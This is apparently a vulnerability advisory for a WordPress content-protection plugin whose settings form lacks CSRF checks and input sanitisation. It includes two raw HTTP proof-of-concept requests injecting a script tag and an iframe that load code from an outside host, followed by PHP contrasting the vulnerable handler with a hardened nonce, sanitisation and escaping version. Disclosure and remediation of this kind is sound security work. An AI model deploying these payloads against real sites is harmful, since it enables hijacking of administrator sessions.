The plugin does not check for CSRF when saving its settings, nor does it perform any validation or sanitisation on them. An attacker can therefore trick a logged-in administrator into submitting the settings form with arbitrary XSS payloads, which are stored and rendered unescaped (persistent XSS, and cross-frame scripting via an injected iframe).
### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Image saving disabled message text: ]

[!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cookie: [admin cookies]

select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&CTRLS=1&cmenu=1&no_menu_msg=PoC+by+m0ze&Save_Options=++Update+Options++

### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Context menu disabled message text: ]

[!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Cookie: [admin cookies]

select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=PoC+by+m0ze&CTRLS=1&cmenu=1&no_menu_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++
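The two requests above work because the settings handler trusts whatever arrives in the POST body. The following PHP is an added illustration, not the plugin's own code: it puts the vulnerable pattern the advisory describes (no nonce check, no sanitisation, unescaped output) next to a hardened version using the WordPress nonce, sanitisation and escaping APIs. The form field names (`image_save_msg`, `no_menu_msg`, `Save_Options`, the `CTRL*` flags) are taken from the PoC requests; the option keys (`pccis_*`), the nonce action name and the function names are assumptions made for the example.

```php
<?php
/*
 * Added example, not code from the plugin. Field names come from the PoC
 * requests in the advisory; option keys, nonce action and function names
 * are assumed for illustration.
 */

// --- Vulnerable pattern (as the advisory describes it) --------------------
function pccis_save_options_vulnerable() {
    if ( isset( $_POST['Save_Options'] ) ) {
        // No nonce: any page an admin visits can auto-submit this form (CSRF).
        // No sanitisation: "><script src=...> is stored verbatim.
        update_option( 'pccis_image_save_msg', $_POST['image_save_msg'] );
        update_option( 'pccis_no_menu_msg',    $_POST['no_menu_msg'] );
    }
}

function pccis_settings_form_vulnerable() {
    $msg = get_option( 'pccis_image_save_msg', '' );
    // Unescaped echo into an attribute: the stored payload closes the quote,
    // and the injected <script> runs for every admin who opens the page.
    echo '<input type="text" name="image_save_msg" value="' . $msg . '">';
}

// --- Hardened pattern ------------------------------------------------------
function pccis_save_options_hardened() {
    if ( ! isset( $_POST['Save_Options'] ) ) {
        return;
    }
    // 1. Capability check: only users allowed to manage options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // 2. CSRF check: the request must carry a valid nonce for this action
    //    (check_admin_referer() dies on failure).
    check_admin_referer( 'pccis_save_options', 'pccis_nonce' );

    // 3. Validation: checkbox flags are coerced to 0/1, nothing else is kept.
    $flags = array( 'select', 'CTRLA', 'CTRLC', 'CTRLX', 'CTRLV',
                    'CTRLINPUT', 'saveimg', 'CTRLS', 'cmenu' );
    foreach ( $flags as $flag ) {
        update_option( 'pccis_' . $flag, empty( $_POST[ $flag ] ) ? 0 : 1 );
    }
    // 4. Sanitisation: the two message texts are plain strings, so strip tags
    //    and control characters before storing them.
    foreach ( array( 'image_save_msg', 'no_menu_msg' ) as $key ) {
        $raw = isset( $_POST[ $key ] ) ? wp_unslash( $_POST[ $key ] ) : '';
        update_option( 'pccis_' . $key, sanitize_text_field( $raw ) );
    }
}

function pccis_settings_form_hardened() {
    $msg = get_option( 'pccis_image_save_msg', '' );
    echo '<form method="post">';
    // Emits the hidden nonce field that check_admin_referer() verifies.
    wp_nonce_field( 'pccis_save_options', 'pccis_nonce' );
    // 5. Output escaping for the context: esc_attr() inside an attribute.
    echo '<input type="text" name="image_save_msg" value="' . esc_attr( $msg ) . '">';
    echo '<input type="submit" name="Save_Options" value="Update Options">';
    echo '</form>';
}

// Front end: these messages are normally handed to JavaScript. Encode the
// value as JSON instead of concatenating it into the script, so quotes and
// "</script>" in a stored value cannot break out of the string literal.
function pccis_frontend_script_hardened() {
    $msg   = get_option( 'pccis_image_save_msg', '' );
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    echo '<script>var pccisImageSaveMsg = ' . wp_json_encode( $msg, $flags ) . ';</script>';
}
```

The fix has to cover every step: the nonce alone blocks the CSRF delivery but still lets a malicious administrator store a payload; sanitising on save alone leaves any pre-existing stored value dangerous; escaping on output is what finally neutralises what is already in the database. Sanitising before `update_option()` also keeps the stored value clean for any other code that reads it.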
YouTube Video
m0ze
m0ze
Yes
2021-04-12
2021-05-17
2021-05-24